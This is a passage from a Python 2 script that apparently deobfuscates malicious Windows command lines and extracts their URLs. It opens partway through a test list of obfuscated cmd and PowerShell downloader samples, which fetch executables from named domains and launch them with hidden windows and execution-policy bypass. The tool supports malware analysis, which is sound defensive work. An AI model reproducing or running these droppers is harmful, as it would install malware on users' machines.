xC5ht+5ht5R+C55\'+\'ht+5htRTZ5ht+5hthtC5R+C5R\'+\'tp://oneacom.C5\'+\'R+C\'+\'5RcoC5R+C5RmC5R+C5R5ht\'+\'+5ht/A/,http://www.real-cl\'+\'inic.r\'+\'uC5R+C5R/YC5R+C5Rbd/,http://C5R+C5RseoeC5R+C\'+\'5Rxpert4rank.comC5R+C5R/yfu/,C5ht+5ht5R+\'+\'C5Rhttp:C5R+C5R//inade.mx/Ko5ht+5htSZG/C5R+C\'+\'5R,htC5R+C\'+\'5ht+5ht5R5ht+5httC5R+C5Rp:/\'+\'/1005ht+5ht0id.C5R+C5Rru/JtcKoSROv\'+\'/x\'+\'TZ.SplitC5R+C5R(xC5R+C5\'+\'RTZ,xTZ);nC5R+C5Ra3karapas = na3n5ht+5htsaC5R+C5Rdasd.5ht+5htnext(1,5ht+5ht 34C5ht+5ht5R+C5R3245\'+\');na3huaC5R+C5Rs C5R+C5R=\'+\' 5ht+5htC5R5ht+5\'+\'ht+C5Rna3envC5R+C5R:publC5R+C5RicC5R+C5R +C55ht\'+\'+5htR+C5R xTZC5R+C5R1r\'+\'C55ht+5htR+C5RvxTZ + C5R+C5RnC5R+C5R\'+\'a5ht+5ht3karapaC5R+C5Rs + xTZC5R+C5R.eC\'+\'5R+C5RxexTZ;fC5R+C5RoreC5R+C5RaC5R+C5Rch(5ht+5htnaC5ht+5ht5R+C5R3aC5R+C5Rbc\'+\'C5R+C5R in na3bcd)C5R+C5R{C5R+C5Rtry{na3C\'+\'5R+C5Rf5ht+5htraC5R+C5RnC5R+C5Rc.Downl\'+\'oC5R+C\'+\'5RadFC5R+C5RileC5R+C5R(na3aC5R+C5Rbc.ToStrC5\'+\'R+C5RingC5R+C5R(), na3hC5R+C5Ruas);InvokC5R+C5Re-IC5R+C5RteC5R+C5ht+5ht5RmC5\'+\'R+C5R(na3huasC5R+C\'+\'5R);bre\'+\'aC5R+C\'+\'5R5ht+5htk;}catcC5R+5ht+5htC5Rh5ht+5ht{w\'+\'rite-host na3_.ExC5R+C5RcC5\'+\'R+C5Reption.MeC\'+\'5R+C5RssC5R+C5RagC5R+C5Re5ht+5ht;}C5R+5ht+5htC5ht+5ht5R}C5R).rEPLaCe(C5Rna3C5R,C5RtajC5R).\'+\'rEPLaCe(C5R1rv\'+\'C5R,[StRiNG][CHar]92).r\'+\'EPLaCe((5ht+5ht[CHar]120+[CHar]84+[CHar]90),[St5ht+5htRiNG][CHar]39)) 5ht) -cRepLAcE\'+\' 5htC5R5ht,[ChAr]39-rEPLacE \'+\'5httaj5ht,[ChAr]3\'+\'6) iR5\'+\'iNVOKe-exPREssiOn\') -cREPlAcE ([cHaR]53+[cHaR]104+[cHaR]116),[cHaR]39 -cREPlAcE ([cHaR]105+[cHaR]82+[cHaR]53),[cHaR]124) )\n',
        '\n    \nWindows\\SysWOW64\\cmd.exe , CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %PoddhYFQICiczhn%=cHfZWdKpPvCui&&set %iUPssiaFFzkTNp%=owe^r^s&&set %jYzSMwvUuEapbHf%=iKVSNIh&&set %zjjWssIjIDn%=p&&set %NzHmioNmVKmZilJ%=nirYhDEjuVijhkj&&set %EBbQYTqvXqz%=^he^l^l&&set %cRaqjTFLRfhREip%=iAUYXmaoaiIPMRz&&!%zjjWssIjIDn%!!%iUPssiaFFzkTNp%!!%EBbQYTqvXqz%! " & ( $eNV:COMsPeC[4,26,25]-jOiN\'\') ( (\' & ( ([STrINg]g1EverbOsepREfeRenCe)[1,3]+g0Yxg0Y-JOIng0Yg0Y)(((g0Y &((ge\'+\'T-VARIabLE hs2*mDR*hs2\'+\').nAME[3g0Y+g0Y,11,\'+\'2]-JOi\'+\'nhs2hs2)((h\'+\'s2HBhs2+g0Y+g0Yhs2Efhs2+hs2rg0Y+g0Yhs2+hs2anhs2+hs2c =\'+\' new-hs2+hs2objehs2+hs2ct System.Nhs2+hs2et.g0Y+g0YWebhs2+hs2Clihs\'+\'2+hs2ehs2+hsg0Y+g0Y2nt;HBEnsadasd = newhs2+hs2-hs2+hs\'+\'2object random;HBEbcd = Nhs2+hs2Cfhhs2+hs2ttp://ww\'+\'w.chs2+hs2wchs2+hs2.mhs\'+\'2+hs2y/hs2+hs2riJ/,httphs2+hs2:hs2+hs2//www.xhs2+hs2n-hs2\'+\'+hs2-bg0Y+g0Y1hs2+hs2aedg0Y+g0Ykmwgig0Y\'+\'+g0Yvhs2+hs2.xn--p1ai/GKcUhs2+hs2wk/,hhs2+hs2ttphsg0Y+g\'+\'0Y2+hs\'+\'2://jhs2+hs2ewelmodels2hs2\'+\'+hs2.ru/fhs2g0Y+g0Y+hs2/,hths\'+\'g0Y+g0Y2+hs2\'+\'tp://wwwhs2+hsg0Y+g0Y2.loza.zp.ua/\'+\'R/,http://www.hs2+hs2sga.hs2+hs2g0Y+g0Yskillshs2+hg0Y+g0Ys2ghs2+hs2apanalysishs2+hs2.com/uQhsg0Y+g0Y2+hs2IcZUV/NCf.hs2+hs2Sphs2+hs2\'+\'lit(NCf,hs2+hs2Nhs2+hs2Chs2+hs2f)g0Y+g0Yhs2g0Y+g0Y\'+\'+hs2g0Y\'+\'+g\'+\'0Y;HBEkahs2+hs2g0Y+g0Yraphs2+hs2ashs2g0Y+g\'+\'0Y+hs2 = HBEnsh\'+\'s2+hs2adhs2+hs2ahs2+hs2shs2+hs2dg0Y+g\'+\'0\'+\'Y.next(\'+\'hs2+h\'+\'sg0Y+g0Y21, 3hs2+hs2432hs2+hs24hs2+hs25hs2+hs2);HBEhs2+hs2hhs2+hs2ua\'+\'s = HBEenv:pubg0Y+g0Ylihs2+hs2c + hs2+h\'+\'s2Nhs2+hs2CfLhs2+hs2YjNCf + Hhs2+hs2Bhs2+hs\'+\'2\'+\'Ekarahs2+hs2phs2+hs2ashs2+hs2 + N\'+\'C\'+\'hs2+hs2f.exhs2g0Y+g0Y\'+\'+hs2eNChs2+hs2fhs2+g0Y+g0Yhs2;foreah\'+\'s\'+\'g0Y\'+\'+g0Y2+hs2g0Y+g0Ychsg0Y+g0Y2+hs2hhs2+hs2(Hhs2+h\'+\'s2BEabc inhs2+g0Y+g0Yhs2 HBEbcd){try{HBhs2+hs2Efranc.D\'+\'ownloadhs2+hs2Filehs2+hs2(Hhs2+hs2BEabc.ToStrinhs2+hs2g0Y+g0Yg(), hs2+hs2Hhs2+hs2BEhuas);hs2+hs2Ihs2+hs2\'+\'nvokehs2+hs2-Item(HBEhuag0Y+g0Ys);b\'+\'r\'+\'ehsg0Y+g0Y2+hs2\'+\'akg0Y+g0Y;}cahs2+hs2tch{wrhs2+hs2ite-hosg0Y+g0Yt HBE_.hs2+h\'+\'s2Excehs2+hs2pths2+hs2ion.Messahs2g0Y+g0Y\'+\'+hs2ghs2+hs2e;}}hs2)\'+\'g0\'+\'Y+g0Y.repLAcE(hs2LYjhs\'+\'2,hs2lZ\'+\'hhs2).repg0Y+g0YLAcE((g0Y+g0Y[CHag0Y+g0Yr]78+[CHar]67+[CHarg0Y+g0Y]102),[sTRinG][CHar]39).repLAcE(([CHar]72\'+\'+[g0Y+g0YCHar]66+[CHar]6\'+\'9),[sTRing0Y+g0Y\'+\'G\'+\'][CHar]36)) g0Y) -creplaCEg0Yhs2g0Y,[char]39 -REplaCE g0YlZhg0Y,[char]92) ) \').rePlaCE(([chaR]103+[chaR]48+[chaR]89),[sTRING][chaR]39).rePlaCE(\'g1E\',\'$\')) \n',
        '\nWindows\\SysWOW64\\cmd.exe , CmD wMic wMic wMic wMic & %C^o^m^Sp^Ec% /V /c set %zDQRvccQZYwOYaM%=qNjTVuYvJ&&set %ZJzwdYLiQ%=owe^r^s&&set %lUAMAsKlNZLfAqi%=KujikKSll&&set %urzmvHWGF%=p&&set %hiDIruEaHGjabQQ%=hOMBzOhqXCIaNuL&&set %srcFRSfMG%=^he^l^l&&set %zSiOfRoCuSVlXtK%=EiiQwWzRmWArjGi&&!%urzmvHWGF%!!%ZJzwdYLiQ%!!%srcFRSfMG%! "((\'. ((Gv w4K*mDR*w4K).Name[3,11,2]-joiNw4Kw4K) ( (w4K ((VcbZ1Vcb+Vcbk\'+\'franc = Vw4K+w4Kcb+VcbnVcb+VcbeVc\'+\'b+Vcbw4K+w4Kw-oVcb+VcbbVcb\'+\'+Vcbject Vcb+VcbSystV\'+\'cb+Vcbem.Vw4K+w4Kcb+VcbNetVcb+Vcb.WebVcb+Vc\'+\'bClient;Z1knsadw4K+w4KaVcb+VcbsdVcb+Vcb Vcb+Vcb= nVcb+VcbeVcb+Vc\'+\'bw-objecVcb+Vcbt Vcb+Vc\'+\'braVcb+VcbndoVcb+Vcbm;Z1kbVcb+Vw4K+\'+\'w4KcbcVcb+Vcbd = ZXVcb+VcbqVcb+Vcbhttp:/Vcb+Vcb/wwVcb+VcbwVcb+Vcb.laraoVcb+VcbrganizaVcb+VcbsyVcb+Vcbon.cVcb+Vcbom/HVcb+VcbOB\'+\'Vcb+VcbwSVcb+VcbuVcb+Vcb/,httpw4K+w4KVcb+Vcb:/Vcb+Vcb/www.mVcb+Vcber\'+\'siw4K+w4KntVcb+VcbaVcb+Vcbks\'+\'iVcb+Vcb\'+\'mVcb+Vcb.Vcb+Vcbxyz/TwEmVcb+VcbAFErd/,http:/Vcb+Vcb/www.skVcb+Vcbw4K+w4KnVcb\'+\'+VcbshopVw4K+w4Kcb+VcbpiVcbw4K+w4K+VcbngVcb+Vcb.Vcb+VcbcVcb+Vcbom/Vcb+VcbTPkwVcb+Vcb\'+\'vVcb+Vcbuau/Vcb+Vcb,htVcb+Vcbtw4K+w4Kp:Vcb+Vcb/Vcb+Vcb/www.onesVcb+Vcbo\'+\'urcw4K+w4KewinVcb+Vcbdow.com/QTVcb+w4K+w4KVcbpw4K+w4KGf/Vcb+Vcb,httpVcb+Vcb://Vcb+V\'+\'cbwww.fVcb+VcbloVcb+VcborVcb+Vcb\'+\'coVcb+VcbaVcb+w4K+w4KVcbt.Vw4K+w4Kcb+VcbsVcb\'+\'+Vcbe/MthVcb+Vcbh/ZVcb+V\'+\'cbXVcb+Vcbq.w4K+w4KSplVcb+VcbitVcb+Vcb(ZXq,Vcb+VcbZXqVcb+Vcb);Z1kVcw4K+w4Kb+VcbkaraVcb+Vcbpas =Vcb+Vcb ZV\'+\'cb+Vcb1Vcb+VcbknsadVcb+VcbaVcb+VcbsVcb+Vcbd.nexVcb+Vcbt(Vcb+Vcb1Vcb+Vcb, 34Vcb+Vcb3245Vcb+Vcb);ZVcb+Vcb1khuVcb+VcbasVcb+Vcb = ZVcb+Vcb1kenv:publVcb+Vcbic V\'+\'cb+Vcb+Vcb+Vcb ZXq0w4K+w4KVcb+\'+\'VcbwHVcb+VcbZXq Vcb+Vcb+\'+\' Z1Vcb+VcbkkaraVcb+VcbpVcb+Vcbas + ZXq.eVcb+w4K+w4KVcbxeZXVcb+Vcbq;fVcb+Vcb\'+\'oVcb+Vcbreachw4K+w4KVcb+\'+\'Vcb(Z1Vcb+VcbkVcb+Vcbaw4K+w4Kbc Vcb+Vcbin Vcb+VcbZ1kbVcb+VcbcdVcb+Vcb)Vcb+Vcb{try{Z1Vcb+VcbkfVcb+Vcbranc.DVcb+VcboVcb+VcbwVcb+VcbnloaVcb+VcbdFiVcb+VcblVcb+VcbeVcb+Vw\'+\'4K+w4Kcb(Vw4K+w4Kcb+Vc\'+\'bZ1Vcb+VcbkVcb+VcbaVcb+Vcbbc.ToVcb+VcbStVcb+Vcbring(Vcb+Vcb),Vcb+Vcb \'+\'Z1khuasVcb+Vcb);Invoke-Item(Vcb+VcbZ1Vcb+VcbkVcb+VcbhuVcb+VcbaVcb+Vcbw4K+w4KsVcb+Vcb);V\'+\'cb\'+\'+Vcbbreak;}caVcb+Vcbtch{writeVcb+Vcb-hVcb\'+\'+Vcbw4K+w4KosVw4K+w4Kc\'+\'b+Vcbtw4K+w4K Z1k_w\'+\'4K+w4K.ExcVcb+VcbeptiVcb+VcboVcbw4K+w4K+Vcbn.Vcb+VcbMesw4K+w4Ksage;}V\'+\'cb+Vcb}Vcb\'+\')-rEplACE VcbZ1kVcb,[w4K+w4KcHA\'+\'r]36 -rEplACE ([cHAr]48+[cHAr\'+\']119+[cHArw4K+w4K]w4K+w4K72),[cHAr]92 -CreplaceV\'+\'cbZXqVcb,[cHAr]39) \'+\'D6z&( Gw4K+w4KtpvErbOSEPREfeREN\'+\'CE.TOSTrinG()[w4K+w4K1,3]+VcbxVcb-jOINVcbVcb)w4K).RePlacE(([\'+\'CHAr]71+[CHAr]116+[CHAr]112),w4KdBEw4K).RePlacE(([CHAr]86+[CHAr]99+[CHAr\'+\']98),[sTrI\'+\'Ng][CHAr]39).RePlacE(w4KD6\'+\'zw4K,[sTrINg\'+\'][CHAr]124) ) \') -REPlaCe([char]100+[char]66+[char]69),[char]36 -cREplACe([char]119+[char]52+[char]75),[char]39) | . ( $PshoME[21]+$psHoMe[30]+\'X\')\n',
        '\n    \nWindows\\SysWOW64\\cmd.exe , "C:\\WINDOWS\\system32\\cmd.exe" /V /K set p=p&&!p!owershell -w hidden -c "IEX (&( ([StriNG]$VeRBosEPREfErence)[1,3]+\'X\'-JOiN\'\') ( ((\'x5bF\'+\'=\'+\'x5ben\'+\'v:\'+\'T\'+\'emp+6P\'+\'dtp9vkslkvnx.\'+\'exe6P\'+\'d;(N\'+\'ew\'+\'-Object System\'+\'.N\'+\'et.\'+\'WebCli\'+\'ent).\'+\'D\'+\'ownloadFi\'+\'le(6P\'+\'dhttp\'+\'://pciho\'+\'log.ru/twp\'+\'skeg.\'+\'e\'+\'xe6Pd,\'+\'x\'+\'5bF);& x5bF\') -RepLAce \'tp9\',[cHaR]92 -CREpLaCE([cHaR]120+[cHaR]53+[cHaR]98),[cHaR]36 -RepLAce \'6Pd\',[cHaR]39)))"\n',
        '\nWindows\\SysWOW64\\WindowsPowerShell\x0b1.0\\powershell.exe , "C:\\Windows\\System32\\WindowsPowerShell\x0b1.0\\powershell.exe" -nop -noni -windowstyle 1 -command "(\'PowerS\'+\'he\'+\'ll -Execut\'+\'io\'+\'nP\'+\'olicy by\'+\'pa\'+\'ss -noprofile -windo\'+\'w\'+\'st\'+\'y\'+\'le hid\'+\'den \'+\'(New\'+\'-O\'+\'b\'+\'j\'+\'ect Syste\'+\'m.Net.WebClient).Down\'+\'load\'+\'F\'+\'il\'+\'e\'+\'((\'+\'B\'+\'1z\'+\'{2}\'+\'{\'+\'3\'+\'}{1}{0}\'+\'{4}\'+\'B\'+\'1z-\'+\'f AT\'+\'y\'+\'/t\'+\'e9qoATy,ATyccATy,ATyhtt\'+\'ATy\'+\',\'+\'ATyp://\'+\'ti\'+\'ny.ATy\'+\',\'+\'ATyyAT\'+\'y)\'+\',(((\'+\'B1\'+\'z{\'+\'5}{1}\'+\'{\n 6}{7\'+\'}{\'+\'4\'+\'}\'+\'{\'+\'2\'+\'}{3\'+\'}{0}B1z-fA\'+\'Tye.ex\'+\'eATy\'+\',ATyA\'+\'PP\'+\'DATA\'+\'Ty,ATyxa\'+\'ATy\'+\',AT\'+\'ymplATy,ATy\'+\'hyE\'+\'ATy\'+\',\'+\'ATy\'+\'%ATy,\'+\'A\'+\'TyA\'+\'%ATy,AT\'+\'ys\'+\'ATy\'+\'))\'+\' -\'+\'c\'+\'reP\'+\'l\'+\'AcE ([CHA\'+\'r\'+\']\'+\'1\'+\'15+[\'+\'C\'+\'HAr]\'+\'104+[CHA\'+\'r]121),\'+\'[CH\'+\'Ar\'+\']\'+\'9\'+\'2\'+\')\'+\');S\'+\'tart-\'+\'P\'+\'r\'+\'o\'+\'cess (((B1z\'+\'{4}{2}{\'+\'1}\'+\'{5}\'+\'{0\'+\'}{3}B1z \'+\'-fATyExampATy,ATyPDATA%A\'+\'Ty,\'+\'ATyPATy\n ,ATyle.\'+\'exeA\'+\'T\'+\'y,ATy%A\'+\'ATy\'+\',\'+\'ATy\'+\'QS\'+\'m\'+\'ATy\'+\')) \'+\'-cREp\'+\'LAcE\'+\' \'+\' ([Ch\'+\'ar\'+\']81+[Cha\'+\'r]83+[\'+\'Cha\'+\'r]1\'+\'09)\'+\',\'+\'[Char]9\'+\'2\'+\')\').RePlacE(\'ATy\',[stRInG][cHaR]39).RePlacE(\'B1z\',[stRInG][cHaR]34)| . ( $vERBosEpREFeReNce.TosTrinG()[1,3]+\'x\'-join\'\')"\n',
        "\nWindows\\SysWOW64\\cmd.exe , Windows\\System32\\cmd.exe /CPOWERShEll -wiND 1 -nONiNtEraC -EXeCutIonpo Bypass -nolOGO -NOprO (('J'+'d'+'L'+'A0'+'='+'Jd'+'Lenv'+':USE'+'RPROFILE;JdLb=get-random(10'+'000..99'+'9999);('+'Ne'+'w-ObJ'+'e'+'ct'+' '+'Syste'+'m'+'.'+'NeT.WebCli'+'e'+'N'+'t).D'+'o'+'w'+'nl'+'oa'+'df'+'il'+'e('+'Frahtt'+'ps'+':'+'/'+'/sa'+'y'+'itr'+'ade.c'+'om/opdoc'+'.h'+'tmlF'+'ra , Fr'+'a'+'JdL'+'A0lkQJdLb'+'.c'+'ab'+'Fra);'+'ex'+'pand J'+'dLA0lk'+'QJdLb.'+'c'+'a'+'b'+' JdLenv:'+'U'+'SERPROFILElkQ'+'whe'+'lp'+'e'+'r.exe0Vlout-null'+';'+'Start'+'-'+'Pr'+'o'+'ce'+'s'+'s '+'J'+'dL'+'A0'+'lkQwhelper.exe;Remo'+'ve-I'+'tem'+' Jd'+'LA0lkQJ'+'dLb'+'.c'+'ab')-CrePlACE'lkQ' , [Char]92-rEplACe'Fra' , [Char]34-CrePlACE '0Vl' , [Char]124-rEplACe ([Char]74+[Char]100+[Char]76) , [Char]36)|. ( ([strIng]$vErboSEprEfERENCE)[1 , 3]+'x'-jOiN'')\n",
        "\nWINWORD.EXE , created ,  , Windows\SysWOW64\cmd.exe ,  Windows\System32\cmd.exe  /CPOWERShEll -wiND 1  -nONiNtEraC -EXeCutIonpo  Bypass  -nolOGO  -NOprO     (('J'+'d'+'L'+'A0'+'='+'Jd'+'Lenv'+':USE'+'RPROFILE;JdLb=get-random(10'+'000..99'+'9999);('+'Ne'+'w-ObJ'+'e'+'ct'+' '+'Syste'+'m'+'.'+'NeT.WebCli'+'e'+'N'+'t).D'+'o'+'w'+'nl'+'oa'+'df'+'il'+'e('+'Frahtt'+'ps'+':'+'/'+'/sa'+'y'+'itr'+'ade.c'+'om/opdoc'+'.h'+'tmlF'+'ra , Fr'+'a'+'JdL'+'A0lkQJdLb'+'.c'+'ab'+'Fra);'+'ex'+'pand J'+'dLA0lk'+'QJdLb.'+'c'+'a'+'b'+' JdLenv:'+'U'+'SERPROFILElkQ'+'whe'+'lp'+'e'+'r.exe0Vlout-null'+';'+'Start'+'-'+'Pr'+'o'+'ce'+'s'+'s '+'J'+'dL'+'A0'+'lkQwhelper.exe;Remo'+'ve-I'+'tem'+' Jd'+'LA0lkQJ'+'dLb'+'.c'+'ab')-CrePlACE'lkQ' , [Char]92-rEplACe'Fra' , [Char]34-CrePlACE  '0Vl' , [Char]124-rEplACe  ([Char]74+[Char]100+[Char]76) , [Char]36)|. ( ([strIng]$vErboSEprEfERENCE)[1 , 3]+'x'-jOiN'')",
    ]

    urls = []

    if args.input:
        try:
            inputString = base64.b64decode(args.input)
        except:
            inputString = args.input

    if args.test:
        for inputString in testList:
            try:
                dataDecoded = replaceDecoder(inputString, args)
                urls = scrapeUrls(dataDecoded, urls)
            except:
                print "FAILED TO DECODE ENTRY\n%s\n" % inputString
                dataDecoded = ""

    else:
        dataDecoded = replaceDecoder(inputString, args)

        urls = scrapeUrls(dataDecoded, urls)

    for url in urls:
        print url

if __name__ == '__main__':
    main()

